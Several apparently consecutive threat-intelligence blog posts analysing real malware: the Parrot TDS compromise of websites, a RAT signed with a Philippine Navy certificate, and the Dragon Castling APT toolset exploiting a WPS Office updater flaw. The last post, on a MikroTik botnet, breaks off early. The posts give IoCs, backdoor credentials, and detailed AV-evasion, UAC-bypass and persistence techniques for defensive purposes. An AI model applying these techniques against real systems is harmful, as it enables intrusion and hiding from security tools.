A new Traffic Direction System (TDS) we are calling Parrot TDS, using tens of thousands of compromised websites, has emerged in recent months and is reaching users from around the world. The TDS has infected various web servers hosting more than 16,500 websites, ranging from adult content sites, personal websites, university sites, and local government sites.
Parrot TDS acts as a gateway for further malicious campaigns to reach potential victims. In this particular case, the infected sites’ appearances are altered by a campaign called FakeUpdate (also known as SocGholish), which uses JavaScript to display fake notices for users to update their browser, offering an update file for download. The file observed being delivered to victims is a remote access tool.
The newly discovered TDS is, in some aspects, similar to the Prometheus TDS that appeared in the spring of 2021 [1]. However, what makes Parrot TDS unique is its robustness and its huge reach, giving it the potential to infect millions of users. We identified increased activity of the Parrot TDS in February 2022 by detecting suspicious JavaScript files on compromised web servers. We analysed its behaviour and identified several versions, as well as several types of campaigns using Parrot TDS. Based on the appearance of the first samples and the registration date of the Command and Control (C2) domains it uses, Parrot TDS has been active since October 2021.
One of the main things that distinguishes Parrot TDS from other TDS is how widespread it is and how many potential victims it has. The compromised websites we found appear to have nothing in common apart from servers hosting poorly secured CMS sites, like WordPress sites. From March 1, 2022 to March 29, 2022, we protected more than 600,000 unique users from around the globe from visiting these infected sites. In this time frame, we protected the most users in Brazil, more than 73,000 unique users, India, nearly 55,000 unique users, and more than 31,000 unique users from the US.
Compromised Websites
In February 2022, we identified a significant increase in the number of websites that contained malicious JavaScript code. This code was appended to the end of almost all JavaScript on the compromised web servers we discovered. Over time, we identified two versions (proxied and direct) of what we are calling Parrot TDS.
In both cases, web servers with different content management systems (CMS) were compromised. Most often WordPress in various versions, including the latest one or Joomla, were affected. Since the compromised web servers have nothing in common, we assume the attackers took advantage of poorly secured servers, with weak login credentials, to gain admin access to the servers, but we do not have enough information to confirm this theory.
Proxied Version
The proxied version communicates with the TDS infrastructure via a malicious PHP script, usually located on the same web server, and executes the response content. A deobfuscated code snippet of the proxied version is shown below.
This code performs basic user filtering based on the User-Agent string, cookies and referrer. Briefly said, this code contacts the TDS only once for each user who visits the infected page. This type of filtering prevents multiple repeating requests and possible server overload.
The aforementioned PHP script serves two purposes. The first is to extract client information like the IP address, referrer and cookies, forward the request from the victim to the Parrot TDS C2 server and send the response in the other direction.
The second functionality allows an attacker to perform arbitrary code execution on the web server by sending a specifically crafted request, effectively creating a backdoor. The PHP script uses different names and is located in different locations, but usually, its name corresponds to the name of the folder it is in (hence the name of the TDS, since it parrots the names of folders).
In several cases, we also identified a traditional web shell on the infected web servers, which was located in various locations under different names but still following the same “parroting” pattern. This web shell likely allowed the attacker more comfortable access to the server, while the backdoor in the PHP script mentioned above was used as a backup option. An example of a web shell identified on one of the compromised web servers is shown below.
Since we have seen several cases of reinfection, it is highly likely that the server automatically restores possibly deleted files using, for example, a cron job. However, we do not have enough information to confirm this theory.
Direct Version
The direct version is almost identical to the previous one. This version utilises the same filtering technique. However, it sends the request directly to the TDS C2 server and, unlike the previous version, omits the malicious backdoor PHP script. It executes the content of the response the same way as the previous version. The whole communication sequence of both versions is depicted below. We experimentally verified that the TDS redirects from one IP address only once.
Identified Campaigns
The Parrot TDS response is JavaScript code that is executed on the client. In general, this code can be arbitrary and exposes clients to further danger. However, in practice, we have seen only two types of responses. The first, shown below, is simply setting the __utma cookie on the client. This happens when the client should not be redirected to the landing page. Due to the cookie-based user filtering mentioned above, this step effectively prevents repeated requests on Parrot TDS C2 servers in the future.
The next code snippet shows the second type, which is a campaign redirection targeting Windows machines.
FakeUpdate Campaign
The most prevalent “customer” of Parrot TDS we saw in the wild was the FakeUpdate campaign. The previous version of this campaign was described by MalwareBytes Lab in 2018 [2]. Although the version we identified slightly differs from the 2018 version, the core remains the same. The user receives JavaScript that changes the appearance of the page and tries to force the user to download malicious code. An example of what such a page looks like is shown below.
This JavaScript also contains a Base64 encoded ZIP file with one malicious JavaScript file inside. Once the user downloads the ZIP file and executes the JavaScript it contains, the code starts fingerprinting the client in several stages and then delivers the final payload.
User Filtering
The entire infection chain is set up so that it is complicated to replicate and, therefore, to investigate it. Parrot TDS provides the first layer of defence, which filters users based on IP address, User-Agent and referrer.
The FakeUpdate campaign provides the second layer of defence, using several mechanisms. The first is using unique URLs that deliver malicious content to only one specific user.
The last defence mechanism is scanning the user’s PC. This scan is performed by several JavaScript codes sent by the FakeUpdate C2 server to the user. This scan harvests the following information.
Name of the PC
User name
Domain name
Manufacturer
Model
BIOS version
Antivirus and antispyware products
MAC address
List of processes
OS version
An overview of the process is shown in the picture below. The first part represents the Parrot TDS filtering based on the IP address, referrer and cookies, and after the user successfully passes these tests, the FakeUpdate page appears. The second part represents the FakeUpdate filtering based on a scan of the victim’s device.
Final Payload
The final payload is then delivered in two phases. In the first phase, a PowerShell script is dropped and run by the malicious JavaScript code. This PowerShell script is downloaded to a temporary folder under a random eight character name (e.g. %Temp%\1c017f89.ps1). However, the name of this PowerShell is hardcoded in the JavaScript code. The content of this script is usually a simple whoami /all command. The result is sent back to the C2 server.
In the second phase, the final payload is delivered. This payload is downloaded to the AppData\Roaming folder. Here, a folder with a random name containing several files is dropped. The payloads we have observed so far are part of the NetSupport Client remote access tool and allow the attacker to gain easy access to the compromised machines [3].
The RAT is commonly named ctfmon.exe (mimicking the name of a legitimate program). It is also automatically started when the computer is switched on by setting an HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Runregistry key.
The installed NetSupport Manager tool is configured so that the user has very little chance of noticing it and, at the same time, gives the attacker maximum opportunities. The tool basically gives the attacker full access to the victim’s machine. To run unnoticed, chat functions are disabled, and the silent option is set on the tool, for example. A gateway is also set up that allows the attacker to connect to the client from anywhere in the world. So far, we’ve seen Chinese domains in the tool’s configuration files used as gateways. The following picture below shows the client settings.
Phishing
We identified several infected servers hosting phishing sites. These phishing sites, imitating, for example, a Microsoft office login page, were hosted on compromised servers in the form of PHP scripts. The figure below shows the aforementioned Microsoft phishing observed on an otherwise legitimate site. We don’t have enough information to assign this to Parrot TDS directly. However, a significant number of the compromised servers contained phishing as well.
Conclusion and Recommendation
We have identified an extensive infrastructure of compromised web servers that served as TDS and put a large number of users at risk. Given that the attacker had almost unlimited access to tens of thousands of web servers, the above list of campaigns is undoubtedly not exhaustive.
The Avast Threat Labs has several recommendations for developers to avoid their servers from being compromised.
Scan all files on the web server with Avast Antivirus.
Replace all JavaScript and PHP files on the web server with original ones.
Use the latest CMS version.
Use the latest versions of installed plugins.
Check for automatically running tasks on the web server (for example, cron jobs).
Check and set up secure credentials. Make sure to always use unique credentials for every service.
Check the administrator accounts on the server. Make sure each of them belongs to you and have strong passwords.
When applicable, set up 2FA for all the web server admin accounts.
Use some of the available security plugins (WordPress, Joomla).
* In attempts to prevent further attacks onto the infected servers, we are providing this hash on demand. Please DM us on Twitter or reach us out at [email protected].
Avast Threat Intelligence Team has found a remote access tool (RAT) actively being used in the wild in the Philippines that uses what appears to be a compromised digital certificate belonging to the Philippine Navy. This certificate is now expired but we see evidence it was in use with this malware in June 2020.
Based on our research, we believe with a high level of confidence that the threat actor had access to the private key belonging to the certificate.
Because this is being used in active attacks now, we are releasing our findings immediately so organizations can take steps to better protect themselves. We have found that this sample is now available on VirusTotal.
Compromised Expired Philippine Navy Digital Certificate
In our analysis we found the sample connects to dost[.]igov-service[.]net:8443 using TLS in a statically linked OpenSSL library.
A WHOIS lookup on the C&C domain gave us the following:
The digital certificate was pinned so that the malware requires the certificate to communicate.
When we checked the digital certificate used for the TLS channel we found the following information:
Some important things to note:
The certificate is a valid certificate with a subject of *.navy.mil.ph, the Philippine Navy.
The certificate has recently expired: it was valid for one year, from Sunday December 15, 2019 until Tuesday December 15, 2020.
Based on our research, we believe with a high level of confidence that the threat actor had access to the private key belonging to the certificate.
While the digital certificate is now expired we see evidence it was in use with this malware in June 2020.
The malicious PE file was found with filename: C:\Windows\System32\wlbsctrl.dll and its hash is: 85FA43C3F84B31FBE34BF078AF5A614612D32282D7B14523610A13944AADAACB.
In analyzing that malicious PE file itself, we found that the compilation timestamp is wrong or was edited. Specifically, the TimeDateStamp of the PE file was modified and set to the year 2004 in both the PE header and Debug Directory as shown below:
However, we found that the author used OpenSSL 1.1.1g and compiled it on April 21, 2020 as shown below:
The username of the author was probably udste. This can be seen in the debug information left inside the used OpenSSL library.
We found that the malware supported the following commands:
run shellcode
read file
write file
cancel data transfer
list drives
rename a file
delete a file
list directory content
Some additional items of note regarding the malicious PE file:
All configuration strings in the malware are encrypted using AES-CBC with the exception of the mutex it uses.That mutex is used as-is without decryption: t7As7y9I6EGwJOQkJz1oRvPUFx1CJTsjzgDlm0CxIa4=.
When this string is decrypted using the hard-coded key it decrypts to QSR_MUTEX_zGKwWAejTD9sDitYcK. We suspect that this is a failed attempt to disguise this malware as the infamous Quasar RAT malware. But this cannot be the case because this sample is written in C++ and the Quasar RAT is written in C#.
Avast customers are protected against this malware.
We recently discovered an APT campaign we are calling Operation Dragon Castling. The campaign is targeting what appears to be betting companies in South East Asia, more specifically companies located in Taiwan, the Philippines, and Hong Kong. With moderate confidence, we can attribute the campaign to a Chinese speaking APT group, but unfortunately cannot attribute the attack to a specific group and are not sure what the attackers are after.
We found notable code similarity between one of the modules used by this APT group (the MulCom backdoor) and the FFRat samples described by the BlackBerry Cylance Threat Research Team in their 2017report and Palo Alto Networks in their 2015report. Based on this, we suspect that the FFRat codebase is being shared between several Chinese adversary groups. Unfortunately, this is not sufficient for attribution as FFRat itself was never reliably attributed.
In this blogpost we will describe the malware used in these attacks and the backdoor planted by the APT group, as well as other malicious files used to gain persistence and access to the infected machines. We will also discuss the two infection vectors we saw being used to deliver the malware: an infected installer and exploitation of a vulnerable legitimate application, WPSOffice.
We identified a new vulnerability (CVE-2022-24934) in the WPS Office updater wpsupdate.exe, which we suspect that the attackers abused.
We would like to thank Taiwan’s TeamT5 for providing us with IoCs related to the infection vector.
Infrastructure and toolset
In the diagram above, we describe the relations between the malicious files. Some of the relations might not be accurate, e.g. we are not entirely sure if the MulCom backdoor is loaded by the CorePlugin. However, we strongly believe that it is one of the malicious files used in this campaign.
Infection Vector
We’ve seen multiple infection vectors used in this campaign. Among others, an attacker sent an email with an infected installer to the support team of one of the targeted companies asking to check for a bug in their software. In this post, we are going to describe another vector we’ve seen: a fake WPS Office update package. We suspect an attacker exploited a bug in the WPS updater wpsupdate.exe, which is a part of the WPS Office installation package. We have contacted WPS Office team about the vulnerability (CVE-2022-24934), which we discovered, and it has since been fixed.
During our investigation we saw suspicious behavior in the WPS updater process. When analyzing the binary we discovered a potential security issue that allows an attacker to use the updater to communicate with a server controlled by the attacker to perform actions on the victim’s system, including downloading and running arbitrary executables. To exploit the vulnerability, a registry key under HKEY_CURRENT_USER needs to be modified, and by doing this an attacker gains persistence on the system and control over the update process. In the case we analyzed, the malicious binary was downloaded from the domain update.wps[.]cn, which is a domain belonging to Kingsoft, but the serving IP (103.140.187.16) has no relationship to the company, so we assume that it is a fake update server used by the attackers. The downloaded binary (setup_CN_2052_11.1.0.8830_PersonalDownload_Triale.exe - B9BEA7D1822D9996E0F04CB5BF5103C48828C5121B82E3EB9860E7C4577E2954) drops two files for sideloading: a signed QMSpeedupRocketTrayInjectHelper64.exe - Tencent Technology (a3f3bc958107258b3aa6e9e959377dfa607534cc6a426ee8ae193b463483c341) and a malicious DLL QMSpeedupRocketTrayStub64.dll.
The first stage is a backdoor communicating with a C&C (mirrors.centos.8788912[.]com). Before contacting the C&C server, the backdoor performs several preparational operations. It hooks three functions: GetProcAddress, FreeLibrary, LdrUnloadDll. To get the C&C domain, it maps itself to the memory and reads data starting at the offset 1064 from the end. The domain name is not encrypted in any way and is stored as a wide string in clear text in the binary.
Then it initializes an object for a JScript class with the named item ScriptHelper. The dropper uses the ImpersonateLoggedOnUser API Call to re-use a token from explorer.exe so it effectively runs under the same user. Additionally, it uses RegOverridePredefKey to redirect the current HKEY_CURRENT_USER to HKEY_CURRENT_USER of an impersonated user. For communication with C&C it constructs a UserAgent string with some system information e.g. Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1;.NET CLR 2.0). The information that is exfiltrated is: Internet Explorer version, Windows version, the value of the “User Agent\Post Platform”registry values.
After that, the sample constructs JScript code to execute. The header of the code contains definitions of two variables: server with the C&C domain name and a hardcoded key. Then it sends the HTTP GET request to /api/connect, the response should be encrypted JScript code that is decrypted, appended to the constructed header and executed using the JScript class created previously.
At the time of analysis, the C&C was not responding, but from the telemetry data we can conclude that it was downloading the next stage from hxxp://mirrors.centos.8788912.com/upload/ea76ad28a3916f52a748a4f475700987.exe to %ProgramData%\icbc_logtmp.exe and executing it.
The second dropper is a runner that, when executed, tries to escalate privileges via the COM Session Moniker Privilege Escalation (MS17-012), then dropping a few binaries, which are stored with the following resource IDs:
Resource ID
Filename
Description
1825
smcache.dat
List of C&C domains
1832
log.dll
Loader (CoreX) 64bit
1840
bdservicehost.exe
Signed PE for sideloading 64bit
1841
N/A
Filenames for sideloading
1817
inst.dat
Working path
1816
hostcfg.dat
Used in the Host header, in C&C communication
1833
bdservicehost.exe
Signed PE for sideloading 32bit – N/A
1831
log.dll
Loader (32bit) – N/A
The encrypted payloads have the following structure:
The encryption key is a wide string starting from offset 0x8. The encrypted data starts at the offset 0x528. To decrypt the data, a SHA256 hash of the key is created using CryptHashData API, and is then used with a hard-coded IV 0123456789abcde to decrypt the data using CryptDecrypt API with the AES256 algorithm. After that, the decrypted data is decompressed with RtlDecompressBuffer. To verify that the decryption went well, the CRC32 of the data is computed and compared to the value at the offset 0x4 of the original resource data. When all the payloads are dropped to the disk, bdservicehost.exe is executed to run the next stage.
The Loader (CoreX) DLL is sideloaded during the previous stage (Dropper 2) and acts as a dropper. Similarly to Dropper 1, it hooks the GetProcAddress and FreeLibrary API functions. These hooks execute the main code of this library. The main code first checks whether it was loaded by regsvr32.exe and then it retrieves encrypted data from its resources. This data is dropped into the same folder as syscfg.dat. The file is then loaded and decrypted using AES-256 with the following options for setup:
Key is the computer name and IV is qwertyui12345678
AES-256 setup parameters are embedded in the resource in the format <key>#<IV>. So you may e.g. see cbfc2vyuzckloknf#8o3yfn0uee429m8d
The main code continues to check if the process ekrn.exe is running. ekrn.exe is an ESET Kernel service. If the ESET Kernel service is running, it will try to remap ntdll.dll. We assume that this is used to bypass ntdll.dll hooking.
After a service check, it will decompress and execute shellcode, which in turn loads a DLL with the next stage. The DLL is stored, unencrypted, as part of the shellcode. The shellcode enumerates exports of ntdll.dll and builds an array with hashes of names of all Zw* functions (windows native API system calls) then sorts them by their RVA. By doing this, the shellcode exploits the fact that the order of RVAs of Zw* functions equals the order of the corresponding syscalls, so an index of the Zw* function in this array is a syscall number, which can be called using the syscall instruction. Security solutions can therefore be bypassed based on the hooking of the API in userspace. Finally, the embedded core module DLL is loaded and executed.
The core module is a single DLL that is responsible for setting up the malware’s working directory, loading configuration files, updating its code, loading plugins, beaconing to C&C servers and waiting for commands.
It has a cascading structure with four steps:
Step 1
The first part is dedicated to initial checks and a few evasion techniques. At first, the core module verifies that the DLL is being run by spdlogd.exe (an executable used for persistence, see below) or that it is not being run by rundll32.exe. If this check fails, the execution terminates. The DLL proceeds by hooking the GetProcAddress and FreeLibrary functions in order to execute the main function, similarly to the previous infection stages.
The malware then creates a new window (named Sample) with a custom callback function. A message with the ID 0x411 is sent to the window via SendMessageW which causes the aforementioned callback to execute the main function. The callback function can also process the 0x412 message ID, even though no specific functionality is tied to it.
Step 2
In the second step, the module tries to self-update, load configuration files and set up its working directory (WD).
Self-update
The malware first looks for a file called new_version.dat – if it exists, its content is loaded into memory, executed in a new thread and a debug string “run code ok” is printed out. We did not come across this file, but based on its name and context, this is most likely a self update functionality.
Load configuration file inst.dat and set up working directory. First, the core module configuration file inst.dat is searched for in the following three locations:
the directory where the core module DLL is located
the directory where the EXE that loaded the core module DLL it is located
C:\ProgramData\
It contains the path to the malware’s working directory in plaintext. If it is not found, a hard-coded directory name is used and the directory is created. The working directory is a location the malware uses to drop or read any files it uses in subsequent execution phases.
Load configuration file smcache.dat.
After the working directory is set up, the sample will load the configuration file smcache.dat from it. This file contains the domains, protocols and port numbers used to communicate with C&C servers (details in Step 4) plus a “comment” string. This string is likely used to identify the campaign or individual victims. It is used to create an empty file on the victim’s computer (see below) and it’s also sent as a part of the initial beacon when communicating with C&C servers. We refer to it as the “comment string” because we have seen a few versions of smcache.dat where the content of the string was “the comment string here” and it is also present in another configuration file with the name comment.dat which has the INI file format and contains this string under the key COMMENT.
Create a log file
Right after the sample finds and reads smcache.dat, it creates a file based on the victim’s username and the comment string from smcache.dat. If the comment string is not present, it will use a default hard-coded value (for example M86_99.lck). Based on the extension it could be a log of some sort, but we haven’t seen any part of the malware writing into it so it could just serve as a lockfile. After the file is successfully created, the malware creates a mutex and goes on to the next step.
Step 3
Next, the malware collects information about the infected environment (such as username, DNS and NetBios computer names as well as OS version and architecture) and sets up its internal structures, most notably a list of “call objects”. Call objects are structures each associated with a particular function and saved into a “dispatcher” structure in a map with hard-coded 4-byte keys. These keys are later used to call the functions based on commands from C&C servers.
The key values (IDs) seem to be structured, where the first three bytes are always the same within a given sample, while the last byte is always the same for a given usage across all the core module samples that we’ve seen. For example, the function that calls the RevertToSelf function is identified by the number 0x20210326 in some versions of the core module that we’ve seen and0x19181726in others. This suggests that the first three bytes of the ID number are tied to the core module version, or more likely the infrastructure version, while the last byte is the actual ID of a function.
ID (last byte)
Function description
0x02
unimplemented function
0x19
retrieves content of smcache.dat and sends it to the C&C server
0x1A
writes data to smcache.dat
0x25
impersonates the logged on user or the explorer.exe process
0x26
function that calls RevertToSelf
0x31
receives data and copies it into a newly allocated executable buffer
0x33
receives core plugin code, drops it on disk and then loads and calls it
0x56
writes a value into comment.dat
Webdav
While initializing the call objects the core module also tries to connect to the URL hxxps://dav.jianguoyun.com/dav/ with the username 12121jhksdf and password 121121212 by calling WNetAddConnection3W. This address was not responsive at the time of analysis but jianguoyun[.]com is a Chinese file sharing service. Our hypothesis is that this is either a way to get plugin code or an updated version of the core module itself.
Plugins
The core module contains a function that receives a buffer with plugin DLL data, saves it into a file with the name kbg<tick_count>.dat in the malware working directory, loads it into memory and then calls its exported function InitCorePlug. The plugin file on disk is set to be deleted on reboot by calling MoveFileExW with the parameter MOVEFILE_DELAY_UNTIL_REBOOT. For more information about the plugins, see the dedicated Plugins section.
Step 4
In the final step, the malware will iterate over C&C servers contained in the smcache.dat configuration file and will try to reach each one. The structure of the smcache.dat config file is as follows:
The protocol string can have one of nine possible values:
TCP
HTTPS
UDP
DNS
ICMP
HTTPSIPV6
WEB
SSH
HTTP
Depending on the protocol tied to the particular C&C domain, the malware sets up the connection, sends a beacon to the C&C and waits for commands.
In this blogpost, we will mainly focus on the HTTP protocol option as we’ve seen it being used by the attackers.
When using the HTTP protocol, the core module first opens two persistent request handles – one for POST and one for GET requests, both to “/connect”. These handles are tested by sending an empty buffer in the POST request and checking the HTTP status code of the GET request. Following this, the malware sends the initial beacon to the C&C server by calling the InternetWriteFile API with the previously opened POST request handle and reads data from the GET request handle by calling InternetReadFile.
The core module uses the following (mostly hard-coded) HTTP headers:
Accept: */*
x-cid: {<uuid>} – new uuid is generated for each GET/POST request pair
Pragma: no-cache
Cache-control: no-transform
User-Agent: <user_agent> – generated from registry or hard-coded (see below)
Host: <host_value> – C&C server domain or the value from hostcfg.dat (see below)
Connection: Keep-Alive
Content-Length: 4294967295 (max uint, only in the POST request)
User-Agent header
The User-Agent string is constructed from the registry the same way as in the Dropper 1 module (including the logged-on user impersonation when accessing registry) or a hard-coded string is used if the registry access fails: “Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)”.
Host header
When setting up this header, the malware looks for either a resource with the ID 1816 or a file called hostcfg.dat if the resource is not found. If the resource or file is found, the content is used as the value in the Host HTTP header for all C&C communication instead of the C&C domain found in smcache.dat. It does not change the actual C&C domain to which the request is made – this suggests the possibility of the C&C server being behind a reverse proxy.
Initial beacon
The first data packet the malware sends to a C&C server contains a base64 encoded LZNT1-compressed buffer, including a newly generated uuid (different from the uuid used in the x-cid header), the victim’s username, OS version and architecture, computer DNS and BIOS names and the comment string found in smcache.dat or comment.dat. The value from comment.dat takes precedence if this file exists.
In the core module sample we analyzed, there was actually a typo in the function that reads the value from comment.dat – it looks for the key “COMMNET” instead of “COMMENT”.
After this, the malware enters a loop waiting for commands from the C&C server in the form of the ID value of one of the call objects. Each message sent to the C&C server contains a hard-coded four byte number value with the same structure as the values used as keys in the call-object map. The ID numbers associated with messages sent to C&C servers that we’ve seen are:
ID (last byte)
Usage
0x1B
message to C&C which contains smcache.dat content
0x24
message to C&C which contains a debug string
0x2F
general message to C&C
0x30
message to C&C, unknown specific purpose
0x32
message to C&C related to plugins
0x80
initial beacon to a C&C server
Interesting observations about the protocols, other than the HTTP protocol:
HTTPS does not use persistent request handles
HTTPS uses HTTP GET request with data Base64-encoded in the cookie header to send the initial beacon
HTTPS, TCP and UDP use a custom “magic” header: Magic-Code: hhjjdfgh
General observations on the core module
The core samples we observed often output debug strings via OutputDebugStringA and OutputDebugStringW or by sending them to the C&C server. Examples of debug strings used by the core module are: its filepath at the beginning of execution, “run code ok” after self-update, “In googo” in the hook of GetProcAddress, “recv bomb” and “sent bomb” in the main C&C communicating function, etc.
String obfuscation
We came across samples of the core module with only cleartext strings but also samples with certain strings obfuscated by XORing them with a unique (per sample) hard-coded key.
Even within the samples that contain obfuscated strings, there are many cleartext strings present and there seems to be no logic in deciding which string will be obfuscated and which won’t. For example, most format strings are obfuscated, but important IoCs such as credentials or filenames are not.
To illustrate this: most strings in the function that retrieves a value from the comment.dat file are obfuscated and the call to GetPrivateProfileStringW is dynamically resolved by the GetProcAddress API, but all the strings in the function that writes into the same config file are in cleartext and there is a direct call to WritePrivateProfileStringW.
Overall, the core module code is quite robust and contains many failsafes and options for different scenarios (for example, the amount of possible protocols used for C&C communication), however, we probably only saw samples of this malware that are still in active development as there are many functions that are not yet implemented and only serve as placeholders.
Plugins
In the section below, we will describe the functionality of the plugins used by the Core Module (Proto8) to extend its functionality.
We are going to describe three plugins with various functionalities, such as:
This plugin is a DLL binary loaded by the fileless core module (Proto8) as mentioned above. It extends the malware’s functionality by adding methods for managing additional plugins. These additional plugins export the function "GetPlugin" which the core plugin executes.
This part uses the same command ID based calling convention as the core module (see above), adding three new methods:
ID (last byte)
Function description
0x2B
send information about plugin location to the to C&C server
0x2C
remove a plugin
0x2A
load a plugin
All plugin binaries used by the core module are stored in the working directory under the name kbg<tick_count>.dat. After the Core Plugin is loaded, it first removes all plugins from the working directory – see the image below.
The DLL we call Zload is an example of a plugin loaded by the Core Plugin. It exports four functions: “GetPlugin”, “Install”, “core_zload” and ”zload”. The main functionality of this plugin is setting up persistence, creating a backdoor user account, and concealing itself on the infected system. We will focus on the exported functions zload, core_zload and the default DllMain function, as they contain the most interesting functionality.
Zload (process starter)
This function is fairly simple, its main objective is to execute another binary. It first retrieves the path to the directory where the Zload plugin binary is located (<root_folder>) and creates a new subfolder called "mec" in it. After this it renames and moves three files into it:
the Zload plugin binary itself as <root_folder>\mec\logexts.dll,
<root_folder>\spdlogd.exe as <root_folder>\mec\spdagent.exe and
<root_folder>\kb.ini as <root_folder>\mec\kb.ini
After the files are renamed and moved, it creates a new process by executing the binary <root_folder>\mec\spdagent.exe (originally <root_folder>\spdlogd.exe).
core_zload (persistence setup)
This function is responsible for persistence which it achieves by registering itself into the list of security support providers (SSPs). Windows SSP DLLs are loaded into the Local Security Authority (LSA) process when the system boots. The code of this function is notably similar to the mimikat_ssp/AddSecurityPackage_RawRPCsource code found on github.
DllMain (sideloading, setup)
The default DllMain function leverages several persistence and evasion techniques. It also allows the attacker to create a backdoor account on the infected system and lower the overall system security.
Persistence
The plugin first checks if its DLL was loaded either by the processes “lsass.exe” or “spdagent.exe”. If the DLL was loaded by “spdagent.exe”, it will adjust the token privileges of the current process.
If it was loaded by “lsass.exe”, it will retrieve the path “kb<num>.dll” from the configuration file “kb.ini” and write it under the registry key HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\WinSock2\\ParametersAutodialDLL. This ensures persistence, as it causes the DLL “kb<num>.dll” to be loaded each time the Winsock 2 library (ws2_32.dll) is invoked.
Evasion
To avoid detection, the plugin first checks the list of running processes for “avp.exe” (Kaspersky Antivirus) or “NortonSecurity.exe” and exits if either of them is found. If these processes are not found on the system, it goes on to conceal itself by changing its own process name to “explorer.exe”.
The plugin also has the capability to bypass the UAC mechanisms and to elevate its process privileges through CMSTP COM interfaces, such as CMSTPLUA {3E5FC7F9-9A51-4367-9063-A120244FBEC7}.
Backdoor user account creation
Next, the plugin carries out registry manipulation (details can be found in the appendix), that lowers the system’s protection by:
Allowing local accounts to have full admin rights when they are authenticating via network logon
Enabling RDP connections to the machine without the user password
Disabling admin approval on an administrator account, which means that all applications run with full administrative privileges
Enabling anonymous SID to be part of the everyone group in Windows
Allowing “Null Session” users to list users and groups in the domain
Allowing “Null Session” users to access shared folders
Setting the name of the pipe that will be accessible to “Null Session” users
After this step, the plugin changes the WebClient service startup type to “Automatic”. It creates a new user with the name “DefaultAccount” and the password “Admin@1999!” which is then added to the “Administrator” and “Remote Desktop Users” groups. It also hides the new account on the logon screen.
As the last step, the plugin checks the list of running processes for process names “360tray.exe” and “360sd.exe” and executes the file "spdlogd.exe" if neither of them is found.
MecGame is another example of a plugin that can be loaded by the Core Plugin. Its main purpose is similar to the previously described Zload plugin – it executes the binary “spdlogd.exe” and achieves persistence by registering an RPC interface with UUID {1052E375-2CE2-458E-AA80-F3B7D6EA23AF}. This RPC interface represents a function that decodes and executes a base64 encoded shellcode.
The MecGame plugin has several methods for executing spdlogd.exe depending on the level of available privileges. It also creates a lockfile with the name MSSYS.lck or <UserName>-XPS.lck depending on the name of the process that loaded it, and deletes the files atomxd.dll and logexts.dll.
It can be installed as a service with the service name “inteloem” or can be loaded by any executable that connects to the internet via the Winsock2 library.
This DLL is a backdoor module which exports four functions: “OperateRoutineW”, “StartRoutineW”, “StopRoutineW” and ”WorkRoutineW”; the main malicious function being “StartRoutineW”.
For proper execution, the backdoor needs configuration data accessed through a shared object with the file mapping name either “Global\\4ED8FD41-2D1B-4CC3-B874-02F0C60FF9CB” or "Local\\4ED8FD41-2D1B-4CC3-B874-02F0C60FF9CB”. Unfortunately we didn’t come across the configuration data, so we are missing some information such as the C&C server domains this module uses.
There are 15 commands supported by this backdoor (although some of them are not implemented) referred to by the following numerical identifiers:
Command ID
Function description
1
Sends collected data from executed commands. It is used only if the authentication with a proxy is done through NTLM
2
Finds out information about the domain name, user name and security identifier of the process explorer.exe. It finds out the user name, domain name, and computer name of all Remote Desktop sessions.
3
Enumerates root disks
4
Enumerates files and finds out their creation time, last access time and last write time
5
Creates a process with a duplicated token. The token is obtained from one of the processes in the list (see Appendix).
6
Enumerates files and finds out creation time, last time access, last write time
7
Renames files
8
Deletes files
9
Creates a directory
101
Sends an error code obtained via GetLastError API function
102
Enumerates files in a specific folder and finds out their creation time, last access time and last write time
103
Uploads a file to the C&C server
104
Not implemented (reserved)
Combination of 105/106/107
Creates a directory and downloads files from the C&C server
Communication protocol
The MulCom backdoor is capable of communicating via HTTP and TCP protocols. The data it exchanges with the C&C servers is encrypted and compressed by the RC4 and aPack algorithms respectively, using the RC4 key loaded from the configuration data object.
It is also capable of proxy server authentication using schemes such as Basic, NTLM, Negotiate or to authenticate via either the SOCKS4 and SOCKS5 protocols.
After successful authentication with a proxy server, the backdoor sends data xorred by the constant 0xBC. This data is a set with the following structure:
Another interesting capability of this backdoor is the usage of layered C&C servers. If this option is enabled in the configuration object (it is not the default option), the first request goes to the first layer C&C server, which returns the IP address of the second layer. Any subsequent communication goes to the second layer directly.
As previously stated, we found several code similarities between the MulCom DLL and the FFRat (a.k.a. FormerFirstRAT).
Conclusion
We have described a robust and modular toolset used most likely by a Chinese speaking APT group targeting gambling-related companies in South East Asia. As we mentioned in this blogpost, there are notable code similarities between FFRat samples and the MulCom backdoor. FFRat or "FormerFirstRAT'' has been publicly associated with the DragonOK group according to the Palo Alto Network report, which has in turn been associated with backdoors like PoisonIvy and PlugX – tools commonly used by Chinese speaking attackers.
We also described two different infection vectors, one of which weaponized a vulnerable WPS Office updater. We rate the threat this infection vector represents as very high, as WPS Office claims to have 1.2 billion installations worldwide, and this vulnerability potentially allows a simple way to execute arbitrary code on any of these devices. We have contacted WPS Office about the vulnerability we discovered and it has since been fixed.
Our research points to some unanswered questions, such as reliable attribution and the attackers’ motivation.
This is the story of piecing together information and research leading to the discovery of one of the largest botnet-as-a-service cybercrime operations we’ve seen in a while. This research reveals that a cryptomining malware campaign we reported in 2018, Glupteba malware, significant DDoS attacks targeting several companies in Russia, including Yandex, as well as in New Zealand, and the United States, and presumably also the TrickBot malware were all distributed by the same C2 server. I strongly believe the C2 server serves as a botnet-as-a-service controlling nearly 230,000 vulnerable MikroTik routers, and may be the Meris botnet QRator Labs described in their blog post, which helped carry out the aforementioned DDoS attacks. Default credentials, several vulnerabilities, but most importantly the CVE-2018-14847 vulnerability, which was publicized in 2018, and for which MikroTik issued a fix for, allowed the cybercriminals behind this botnet to enslave all of these routers, and to presumably rent them out as a service.
The evening of July 8, 2021
As a fan of MikroTik routers, I keep a close eye on what’s going on with these routers. I have been tracking MikroTik routers for years, reporting a crypto mining campaign abusing the routers as far back as 2018. The mayhem around MikroTik routers began in 2018 mainly thanks to vulnerability CVE-2018-14847, which allowed cybercriminals to very easily bypass authentication on the routers. Sadly, many MikroTik routers were left unpatched, leaving their default credentials exposed on the internet.
